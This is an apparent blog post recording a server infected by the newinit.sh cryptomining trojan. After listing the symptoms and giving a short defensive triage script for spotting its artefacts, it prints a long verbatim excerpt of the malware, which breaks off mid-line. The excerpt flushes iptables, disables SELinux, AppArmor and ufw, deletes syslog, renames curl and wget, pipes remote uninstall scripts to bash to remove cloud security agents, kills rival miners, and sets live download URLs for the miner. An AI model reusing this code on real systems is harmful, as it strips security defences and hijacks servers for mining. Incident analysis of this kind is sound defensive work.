Record of a server attacked by the newinit.sh mining trojan
Posted by 抛物线.
1. Infection symptoms (resolving a server that had a mining script injected through a Redis backdoor vulnerability)
- The server load is abnormal; specifically, the load value spikes.
- Some server commands are unusable, such as top, ps, pstree and chattr.
- The key issue is the impact on the business services that are running.
- Because the commands have been tampered with, ps -ef cannot find the miner.
2. The trojan script (more than 1000 lines):
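The symptoms above (renamed or replaced commands, locked placeholder files, a marker file, watchdog and SELinux switched off) can be checked for directly. The following triage helper is an added example written for this write-up, not code from the original post or from the malware; it scans a filesystem root (assumed to be / or a mounted image) for the specific artefacts the listing below creates.

```shell
#!/bin/sh
# Triage helper added for this write-up (not part of the original post or of the
# malware). It scans a filesystem root for artefacts the newinit.sh listing
# creates: curl/wget/chattr renamed to cd1/wd1/t, the /etc/zzhs marker, the
# one-byte placeholder files it locks with chattr +i, core tools that are no
# longer ELF executables, and the sysctl/SELinux settings it rewrites.
# Usage: check_newinit_indicators [ROOT]  (ROOT defaults to /; a mounted image
# or a test tree works too). Findings go to stderr, the hit count to stdout.

check_newinit_indicators() {
  root="${1:-}"
  hits=0
  note() { echo "indicator: $*" >&2; hits=$((hits + 1)); }

  # curl/wget are moved to cd1/wd1 and chattr to t before the real names are reused
  for f in usr/bin/cd1 usr/bin/wd1 usr/bin/t etc/zzhs; do
    [ -e "$root/$f" ] && note "$root/$f exists"
  done

  # one-byte placeholders written over known miner names and made immutable
  for f in ip6network kswaped irqbalanced rctlcli systemd-network pamdicks; do
    p="$root/usr/bin/$f"
    [ -f "$p" ] && [ "$(wc -c < "$p" | tr -d ' ')" -le 2 ] && note "placeholder $p"
  done

  # core tools replaced by wrappers: a genuine ps/top/pstree/chattr is an ELF file
  for f in ps top pstree chattr; do
    p="$root/usr/bin/$f"
    [ -f "$p" ] && [ "$(head -c 4 "$p")" != "$(printf '\177ELF')" ] && note "$p is not an ELF binary"
  done

  # hardening rolled back: NMI watchdog off in sysctl.conf, SELinux disabled
  grep -qs 'kernel.nmi_watchdog=0' "$root/etc/sysctl.conf" && note "nmi_watchdog disabled in sysctl.conf"
  grep -qs '^SELINUX=disabled' "$root/etc/selinux/config" && note "SELinux disabled in /etc/selinux/config"

  echo "$hits"
}
```

A non-zero count is a reason to pull the host from service and compare every flagged binary against the package manager's copy before trusting any output from ps or top on that machine.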
#!/bin/sh
ulimit -n 65535
chmod 777 /usr/bin/chattr
chmod 777 /bin/chattr
chattr -iua /tmp/
chattr -iua /var/tmp/
iptables -F
ufw disable
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
chattr -iua /tmp/
chattr -iua /var/tmp/
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
rm -rf /var/log/syslog
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat $crondir`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/zzhs
rtdir="/etc/zzhs"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/wgettnt /usr/bin/wd1
mv /usr/bin/curltnt /usr/bin/cd1
mv /usr/bin/wget1 /usr/bin/wd1
mv /usr/bin/curl1 /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/xget /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
mv /usr/bin/wget /usr/bin/wd1
mv /usr/bin/curl /usr/bin/cd1
if ps aux | grep -i '[a]liyun'; then
$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH stop && /usr/local/cloudmonitor/CmsGoAgent.linux-$ARCH uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aegis' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk 'print $11' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'aegis' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'Yun' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'hids' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'edr' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'cloudwalker' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'titanagent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'sgagent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'barad_agent' | awk 'print $2' | xargs -I kill -9
ps aux | grep -v grep | grep 'hostguard' | awk 'print $2' | xargs -I kill -9
rm -rf /usr/local/aegis
miner_url="http://45.83.123.29/cleanfda/zzh"
miner_url_backup="http://en2an.top/cleanfda/zzh"
miner_size="2269048"
sh_url="http://45.83.123.29/cleanfda/newinit.sh"
sh_url_backup="http://en2an.top/cleanfda/newinit.sh"
chattr_size="8000"
sleep 1
if [ -x "$(command -v t)" ]; then
mv /usr/bin/t /usr/bin/chattr
fi
if [ -x "$(command -v chattr)" ]; then
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
fi
sleep 1
rm -f /tmp/.null 2>/dev/null
echo 128 > /proc/sys/vm/nr_hugepages
sysctl -w vm.nr_hugepages=128
kill_miner_proc()
netstat -anp | grep 194.87.139.103 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk 'print $7' | awk -F'[/]' 'print $1' | xargs -I % kill -9 %
netstat -anp | grep :23 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :10008 | awk 'print $7' | awk -F'[/]' 'print $1' | grep -v "-" | xargs -I % kill -9 %
ps.original aux | grep -v grep | grep ':13531' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':3333' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\\' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'log_' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'systemten' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netns' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'voltuned' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'darwin' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/dl' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ddg' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/pprt' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ppol' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/jmx*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '86s.jpg' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aGTSGJJp' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nMrfmnRa' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'PuNY5tm2' | awk 'print $2' | xargs -I % kill -9 %
ps aux | grep -v grep |